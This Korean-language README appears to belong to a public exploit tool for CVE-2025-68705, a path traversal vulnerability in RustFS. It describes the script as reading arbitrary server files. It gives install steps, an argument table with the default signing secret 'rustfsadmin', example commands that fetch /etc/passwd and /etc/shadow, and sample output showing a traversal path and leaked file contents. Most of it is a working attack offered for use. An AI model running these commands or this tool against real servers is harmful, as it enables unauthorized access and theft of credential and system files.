
CVE-2025-68705 RustFS Path Traversal Vulnerability Check
이 스크립트는 RustFS의 경로 탐색 취약점(CVE-2025-68705)을 악용하여 서버의 임의 파일을 읽을 수 있게 합니다.
requirements.txt 참조git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]
| 인자 | 설명 |
|---|---|
-H, --host | 대상 호스트 IP 또는 호스트명 |
-p, --port | 대상 포트 번호 |
-f, --file | 읽을 파일 경로 (--check-only 사용 시 선택 사항) |
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret
python exp.py -H 192.168.1.128 -p 9000 --check-only
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] 대상: 192.168.1.128:19010
[*] 비밀 키: rustfsadmin
--------------------------------------------------
[*] CVE-2025-68705 취약점 확인 중...
[*] 192.168.1.128:19010에 대해 CVE-2025-68705 악용 중
[*] 파일 읽는 중: ../../../../etc/passwd
[+] 대상이 취약함!
--------------------------------------------------
[*] 192.168.1.128:19010에 대해 CVE-2025-68705 악용 중
[*] 파일 읽는 중: ../../../../../../../../etc/hosts
[+] 파일 읽기 성공!
[+] 파일 내용 (offset=0, length=100):
--------------------------------------------------
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.
| 인자 | 설명 | 기본값 |
|---|
-s, --secret | 서명용 비밀 키 | rustfsadmin |
-o, --offset | 파일 읽기 오프셋 | 0 |
-l, --length | 읽을 바이트 수 | 4096 |
--check-only | 대상이 취약한지만 확인 | - |